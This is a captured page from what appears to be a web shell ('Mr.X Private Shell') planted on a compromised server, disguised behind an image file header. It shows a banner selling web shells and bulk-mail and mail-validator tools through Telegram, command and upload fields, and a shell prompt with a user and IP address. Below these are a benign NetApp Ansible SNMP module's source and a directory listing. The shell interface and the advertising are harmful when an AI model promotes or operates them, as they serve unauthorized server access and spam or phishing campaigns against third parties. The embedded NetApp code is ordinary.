����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

deexcl@216.73.217.71: ~ $
"""
create SNMP module to add/delete/modify SNMP user
"""

# (c) 2018-2021, NetApp, Inc
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type


DOCUMENTATION = '''
author: NetApp Ansible Team (@carchi8py) <ng-ansibleteam@netapp.com>
description:
  - "Create/Delete SNMP community"
extends_documentation_fragment:
  - netapp.ontap.netapp.na_ontap
module: na_ontap_snmp
options:
  access_control:
    choices: ['ro']
    description:
      - "Access control for the community. The only supported value is 'ro' (read-only). Ignored with REST"
    default: 'ro'
    type: str
  community_name:
    description:
      - "The name of the SNMP community to manage."
    required: true
    type: str
  state:
    choices: ['present', 'absent']
    description:
      - "Whether the specified SNMP community should exist or not."
    default: 'present'
    type: str
short_description: NetApp ONTAP SNMP community
version_added: 2.6.0
'''

EXAMPLES = """
    - name: Create SNMP community (ZAPI only)
      netapp.ontap.na_ontap_snmp:
        state: present
        community_name: communityName
        access_control: 'ro'
        use_rest: never
        hostname: "{{ netapp_hostname }}"
        username: "{{ netapp_username }}"
        password: "{{ netapp_password }}"
    - name: Create SNMP community (snmpv1 or snmpv2) (REST only)
      netapp.ontap.na_ontap_snmp:
        state: present
        community_name: communityName
        use_rest: always
        hostname: "{{ netapp_hostname }}"
        username: "{{ netapp_username }}"
        password: "{{ netapp_password }}"

    - name: Delete SNMP community (ZAPI only)
      netapp.ontap.na_ontap_snmp:
        state: absent
        community_name: communityName
        access_control: 'ro'
        use_rest: never
        hostname: "{{ netapp_hostname }}"
        username: "{{ netapp_username }}"
        password: "{{ netapp_password }}"
    - name: Delete SNMP community (snmpv1 or snmpv2) (REST only)
      netapp.ontap.na_ontap_snmp:
        state: absent
        community_name: communityName
        use_rest: always
        hostname: "{{ netapp_hostname }}"
        username: "{{ netapp_username }}"
        password: "{{ netapp_password }}"
"""

RETURN = """
"""
import traceback
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils._text import to_native
import ansible_collections.netapp.ontap.plugins.module_utils.netapp as netapp_utils
from ansible_collections.netapp.ontap.plugins.module_utils.netapp_module import NetAppModule
from ansible_collections.netapp.ontap.plugins.module_utils.netapp import OntapRestAPI
import ansible_collections.netapp.ontap.plugins.module_utils.rest_response_helpers as rrh

HAS_NETAPP_LIB = netapp_utils.has_netapp_lib()


class NetAppONTAPSnmp(object):
    '''Class with SNMP methods, doesn't support check mode'''

    def __init__(self):
        self.argument_spec = netapp_utils.na_ontap_host_argument_spec()
        self.argument_spec.update(dict(
            state=dict(required=False, type='str', choices=['present', 'absent'], default='present'),
            community_name=dict(required=True, type='str'),
            access_control=dict(required=False, type='str', choices=['ro'], default='ro'),
        ))

        self.module = AnsibleModule(
            argument_spec=self.argument_spec,
            supports_check_mode=True
        )

        self.na_helper = NetAppModule()
        # set up state variables
        self.parameters = self.na_helper.set_parameters(self.module.params)

        # Set up Rest API
        self.rest_api = OntapRestAPI(self.module)
        self.use_rest = self.rest_api.is_rest()

        if not self.use_rest:
            if HAS_NETAPP_LIB is False:
                self.module.fail_json(msg="the python NetApp-Lib module is required")
            else:
                self.server = netapp_utils.setup_na_ontap_zapi(module=self.module)

    def invoke_snmp_community(self, zapi):
        """
        Invoke zapi - add/delete take the same NaElement structure
        """
        snmp_community = netapp_utils.zapi.NaElement.create_node_with_children(
            zapi, **{'community': self.parameters['community_name'],
                     'access-control': self.parameters['access_control']})
        try:
            self.server.invoke_successfully(snmp_community, enable_tunneling=True)
        except netapp_utils.zapi.NaApiError as error:
            if zapi == 'snmp-community-add':
                action = 'adding'
            elif zapi == 'snmp-community-delete':
                action = 'deleting'
            else:
                action = 'unexpected'
            self.module.fail_json(msg='Error %s community %s: %s' % (action, self.parameters['community_name'], to_native(error)),
                                  exception=traceback.format_exc())

    def get_snmp(self):
        """
        Check if SNMP community exists
        """
        if self.use_rest:
            return self.get_snmp_rest()
        snmp_obj = netapp_utils.zapi.NaElement('snmp-status')
        try:
            result = self.server.invoke_successfully(snmp_obj, True)
        except netapp_utils.zapi.NaApiError as error:
            self.module.fail_json(msg=to_native(error), exception=traceback.format_exc())
        if result.get_child_by_name('communities') is not None:
            for snmp_entry in result.get_child_by_name('communities').get_children():
                community_name = snmp_entry.get_child_content('community')
                if community_name == self.parameters['community_name']:
                    return {
                        'community_name': snmp_entry.get_child_content('community'),
                        'access_control': snmp_entry.get_child_content('access-control'),
                    }
        return None

    def get_snmp_rest(self):
        # There can be SNMPv1, SNMPv2 (called community) or
        # SNMPv3 local or SNMPv3 remote (called users)
        api = 'support/snmp/users'
        params = {'name': self.parameters['community_name'],
                  'fields': 'name,engine_id'}
        message, error = self.rest_api.get(api, params)
        record, error = rrh.check_for_0_or_1_records(api, message, error)
        if error:
            self.module.fail_json(msg=error)
        if record:
            # access control does not exist in rest
            return dict(community_name=record['name'], engine_id=record['engine_id'], access_control='ro')
        return None

    def add_snmp_community(self):
        """
        Adds a SNMP community
        """
        if self.use_rest:
            self.add_snmp_community_rest()
        else:
            self.invoke_snmp_community('snmp-community-add')

    def add_snmp_community_rest(self):
        api = 'support/snmp/users'
        params = {'name': self.parameters['community_name'],
                  'authentication_method': 'community'}
        message, error = self.rest_api.post(api, params)
        if error:
            self.module.fail_json(msg=error)

    def delete_snmp_community(self, current=None):
        """
        Delete a SNMP community
        """
        if self.use_rest:
            self.delete_snmp_community_rest(current)
        else:
            self.invoke_snmp_community('snmp-community-delete')

    def delete_snmp_community_rest(self, current):
        api = 'support/snmp/users/' + current['engine_id'] + '/' + self.parameters["community_name"]
        dummy, error = self.rest_api.delete(api)
        if error:
            self.module.fail_json(msg=error)

    def apply(self):
        """
        Apply action to SNMP community
        This module is not idempotent:
        Add doesn't fail the playbook if user is trying
        to add an already existing snmp community
        """
        # TODO: This module should of been called snmp_community has it only deals with community and not snmp
        current = self.get_snmp()
        cd_action = self.na_helper.get_cd_action(current, self.parameters)
        if self.na_helper.changed and not self.module.check_mode:
            if cd_action == 'create':
                self.add_snmp_community()
            elif cd_action == 'delete':
                self.delete_snmp_community(current)
        result = netapp_utils.generate_result(self.na_helper.changed, cd_action)
        self.module.exit_json(**result)


def main():
    '''Execute action'''
    community_obj = NetAppONTAPSnmp()
    community_obj.apply()


if __name__ == '__main__':
    main()

Filemanager

Name Type Size Permission Actions
__pycache__ Folder 0755
na_ontap_active_directory.py File 14.01 KB 0644
na_ontap_active_directory_domain_controllers.py File 8.48 KB 0644
na_ontap_aggregate.py File 49.5 KB 0644
na_ontap_autosupport.py File 19.35 KB 0644
na_ontap_autosupport_invoke.py File 6.52 KB 0644
na_ontap_bgp_peer_group.py File 12.33 KB 0644
na_ontap_broadcast_domain.py File 29.74 KB 0644
na_ontap_broadcast_domain_ports.py File 8.37 KB 0644
na_ontap_cg_snapshot.py File 8.23 KB 0644
na_ontap_cifs.py File 23.23 KB 0644
na_ontap_cifs_acl.py File 14.53 KB 0644
na_ontap_cifs_local_group.py File 7.85 KB 0644
na_ontap_cifs_local_group_member.py File 11.25 KB 0644
na_ontap_cifs_local_user.py File 8.44 KB 0644
na_ontap_cifs_local_user_modify.py File 8.63 KB 0644
na_ontap_cifs_local_user_set_password.py File 5.94 KB 0644
na_ontap_cifs_server.py File 25.92 KB 0644
na_ontap_cluster.py File 33.16 KB 0644
na_ontap_cluster_ha.py File 5.3 KB 0644
na_ontap_cluster_peer.py File 19.14 KB 0644
na_ontap_command.py File 11.33 KB 0644
na_ontap_debug.py File 11.05 KB 0644
na_ontap_disk_options.py File 5.23 KB 0644
na_ontap_disks.py File 15.02 KB 0644
na_ontap_dns.py File 14.22 KB 0644
na_ontap_domain_tunnel.py File 4.88 KB 0644
na_ontap_efficiency_policy.py File 18.31 KB 0644
na_ontap_ems_destination.py File 6.97 KB 0644
na_ontap_ems_filter.py File 9.25 KB 0644
na_ontap_export_policy.py File 10.24 KB 0644
na_ontap_export_policy_rule.py File 32.27 KB 0644
na_ontap_fcp.py File 9.84 KB 0644
na_ontap_fdsd.py File 4.87 KB 0644
na_ontap_fdsp.py File 4.88 KB 0644
na_ontap_fdspt.py File 8.11 KB 0644
na_ontap_fdss.py File 3.51 KB 0644
na_ontap_file_directory_policy.py File 15.37 KB 0644
na_ontap_file_security_permissions.py File 36.06 KB 0644
na_ontap_file_security_permissions_acl.py File 21.03 KB 0644
na_ontap_firewall_policy.py File 13.85 KB 0644
na_ontap_firmware_upgrade.py File 41.58 KB 0644
na_ontap_flexcache.py File 28.38 KB 0644
na_ontap_fpolicy_event.py File 18.51 KB 0644
na_ontap_fpolicy_ext_engine.py File 20.8 KB 0644
na_ontap_fpolicy_policy.py File 15.76 KB 0644
na_ontap_fpolicy_scope.py File 23.33 KB 0644
na_ontap_fpolicy_status.py File 9.96 KB 0644
na_ontap_igroup.py File 29.17 KB 0644
na_ontap_igroup_initiator.py File 8.28 KB 0644
na_ontap_info.py File 72.19 KB 0644
na_ontap_interface.py File 71.15 KB 0644
na_ontap_ipspace.py File 10.23 KB 0644
na_ontap_iscsi.py File 12.24 KB 0644
na_ontap_iscsi_security.py File 13.12 KB 0644
na_ontap_job_schedule.py File 20 KB 0644
na_ontap_kerberos_interface.py File 8.3 KB 0644
na_ontap_kerberos_realm.py File 17.46 KB 0644
na_ontap_ldap.py File 7.33 KB 0644
na_ontap_ldap_client.py File 22.46 KB 0644
na_ontap_license.py File 29.15 KB 0644
na_ontap_local_hosts.py File 7.3 KB 0644
na_ontap_log_forward.py File 11.83 KB 0644
na_ontap_login_messages.py File 12.76 KB 0644
na_ontap_lun.py File 56.54 KB 0644
na_ontap_lun_copy.py File 8 KB 0644
na_ontap_lun_map.py File 13.03 KB 0644
na_ontap_lun_map_reporting_nodes.py File 10.87 KB 0644
na_ontap_mcc_mediator.py File 5.42 KB 0644
na_ontap_metrocluster.py File 5.28 KB 0644
na_ontap_metrocluster_dr_group.py File 7.89 KB 0644
na_ontap_motd.py File 7.76 KB 0644
na_ontap_name_mappings.py File 11.6 KB 0644
na_ontap_name_service_switch.py File 10.45 KB 0644
na_ontap_ndmp.py File 13.49 KB 0644
na_ontap_net_ifgrp.py File 22.62 KB 0644
na_ontap_net_port.py File 11.03 KB 0644
na_ontap_net_routes.py File 13.84 KB 0644
na_ontap_net_subnet.py File 16.43 KB 0644
na_ontap_net_vlan.py File 13.32 KB 0644
na_ontap_nfs.py File 34.3 KB 0644
na_ontap_node.py File 9.74 KB 0644
na_ontap_ntfs_dacl.py File 13.41 KB 0644
na_ontap_ntfs_sd.py File 10.14 KB 0644
na_ontap_ntp.py File 10.27 KB 0644
na_ontap_ntp_key.py File 5.7 KB 0644
na_ontap_nvme.py File 9.42 KB 0644
na_ontap_nvme_namespace.py File 9.3 KB 0644
na_ontap_nvme_subsystem.py File 19.7 KB 0644
na_ontap_object_store.py File 13.8 KB 0644
na_ontap_partitions.py File 17.81 KB 0644
na_ontap_ports.py File 23.49 KB 0644
na_ontap_portset.py File 18.02 KB 0644
na_ontap_publickey.py File 10.76 KB 0644
na_ontap_qos_adaptive_policy_group.py File 12.75 KB 0644
na_ontap_qos_policy_group.py File 24.56 KB 0644
na_ontap_qtree.py File 17.83 KB 0644
na_ontap_quota_policy.py File 9.62 KB 0644
na_ontap_quotas.py File 40.3 KB 0644
na_ontap_rest_cli.py File 4.84 KB 0644
na_ontap_rest_info.py File 54.29 KB 0644
na_ontap_restit.py File 13.1 KB 0644
na_ontap_s3_buckets.py File 25.13 KB 0644
na_ontap_s3_groups.py File 8.38 KB 0644
na_ontap_s3_policies.py File 8.51 KB 0644
na_ontap_s3_services.py File 7.89 KB 0644
na_ontap_s3_users.py File 6.86 KB 0644
na_ontap_security_certificates.py File 17.9 KB 0644
na_ontap_security_config.py File 12.77 KB 0644
na_ontap_security_ipsec_ca_certificate.py File 6.92 KB 0644
na_ontap_security_ipsec_config.py File 4.39 KB 0644
na_ontap_security_ipsec_policy.py File 17.64 KB 0644
na_ontap_security_key_manager.py File 27.86 KB 0644
na_ontap_security_ssh.py File 7.2 KB 0644
na_ontap_service_policy.py File 12.93 KB 0644
na_ontap_service_processor_network.py File 17.83 KB 0644
na_ontap_snaplock_clock.py File 6.08 KB 0644
na_ontap_snapmirror.py File 86.94 KB 0644
na_ontap_snapmirror_policy.py File 52.81 KB 0644
na_ontap_snapshot.py File 18.52 KB 0644
na_ontap_snapshot_policy.py File 31.57 KB 0644
na_ontap_snmp.py File 8.45 KB 0644
na_ontap_snmp_traphosts.py File 4.26 KB 0644
na_ontap_software_update.py File 34.05 KB 0644
na_ontap_ssh_command.py File 9.34 KB 0644
na_ontap_storage_auto_giveback.py File 9.69 KB 0644
na_ontap_storage_failover.py File 6.92 KB 0644
na_ontap_svm.py File 42.08 KB 0644
na_ontap_svm_options.py File 5.33 KB 0644
na_ontap_ucadapter.py File 11.6 KB 0644
na_ontap_unix_group.py File 18.27 KB 0644
na_ontap_unix_user.py File 12.12 KB 0644
na_ontap_user.py File 40.32 KB 0644
na_ontap_user_role.py File 22.64 KB 0644
na_ontap_volume.py File 142.63 KB 0644
na_ontap_volume_autosize.py File 15.57 KB 0644
na_ontap_volume_clone.py File 14.79 KB 0644
na_ontap_volume_efficiency.py File 32.69 KB 0644
na_ontap_volume_snaplock.py File 8.67 KB 0644
na_ontap_vscan.py File 5.85 KB 0644
na_ontap_vscan_on_access_policy.py File 24.2 KB 0644
na_ontap_vscan_on_demand_task.py File 17.45 KB 0644
na_ontap_vscan_scanner_pool.py File 12 KB 0644
na_ontap_vserver_audit.py File 13.73 KB 0644
na_ontap_vserver_cifs_security.py File 12.08 KB 0644
na_ontap_vserver_peer.py File 19.63 KB 0644
na_ontap_vserver_peer_permissions.py File 7.29 KB 0644
na_ontap_wait_for_condition.py File 16.11 KB 0644
na_ontap_wwpn_alias.py File 6.03 KB 0644
na_ontap_zapit.py File 10.09 KB 0644